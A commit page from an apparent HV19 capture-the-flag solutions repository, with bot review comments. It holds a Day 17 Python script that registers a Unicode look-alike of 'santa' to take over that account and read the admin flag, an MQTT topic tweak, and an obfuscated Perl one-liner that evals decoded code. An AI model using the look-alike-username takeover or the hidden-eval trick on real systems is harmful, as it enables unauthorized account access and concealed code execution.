
Day17 code

Roman Hergenreder 4 years ago
parent
commit
5267a8d008
5 changed files with 37 additions and 1 deletions
  1. 1 1
      Day 15/exploit.py
  2. 0 0
      Day 16/decode.py
  3. 33 0
      Day 17/exploit.py
  4. 2 0
      Day 17/source.phps
  5. 1 0
      Hidden 04/input.pl

+ 1 - 1
Day 15/exploit.py

@@ -7,7 +7,7 @@ import logging
 
 def on_connect(client, userdata, flags, rc):
     if rc == 0:
-        path = 'HV19/#';
+        path = 'HV19/gifts/#';
         client.subscribe(path, qos=0)
 
 def on_message(client, userdata, msg):
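Review bot: The added line `path = 'HV19/gifts/#';` keeps a trailing semicolon, which is a no-op in Python and reads as a carry-over from another language; drop it: `path = 'HV19/gifts/#'`. Since the value is a fixed constant, hoisting it to a module-level name such as `TOPIC = 'HV19/gifts/#'` would make the subscription target visible without reading on_connect, though that is a preference rather than a defect. on_message begins on the last line of the hunk and continues outside it.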

+ 0 - 0
Day 16/debug.py → Day 16/decode.py


+ 33 - 0
Day 17/exploit.py

@@ -0,0 +1,33 @@
+#!/usr/bin/python
+
+import requests
+import random
+import string
+import re
+
+BASE_URL = "http://whale.hacking-lab.com:8881"
+PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
+SESSION = requests.session()
+FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
+
+# 1. register user santa
+res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
+if res.status_code != 200 or "Registration successful!" not in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print(res.text)
+    exit(1)
+
+# 2. login
+res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print(res.text)
+    exit(1)
+
+# 3. get flag
+res = SESSION.get(BASE_URL + "/admin.php")
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    exit(1)
+
+print(FLAG_PATTERN.search(res.text))
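Review bot: Each error branch will raise AttributeError before printing anything, because `res.status_text` is not an attribute of a requests Response; the reason phrase is `res.reason`, so the three occurrences (after the register, login and admin requests) should read `print("Server returned: %d %s" % (res.status_code, res.reason))`. `FLAG_PATTERN` is built from a non-raw string, so `\{` and `\}` are invalid escape sequences that recent Pythons warn about; use `re.compile(r"HV19\{[^}]*\}")`. The closing `print(FLAG_PATTERN.search(res.text))` prints the Match object (or `None`) instead of the matched text; bind the result, check it for `None`, and print `.group(0)`. The script also terminates through the builtin `exit()`, which is meant for interactive use, whereas `sys.exit(1)` is the conventional form in scripts.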

+ 2 - 0
Day 17/source.phps


+ 1 - 0
Hidden 04/input.pl

@@ -0,0 +1 @@
+s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee
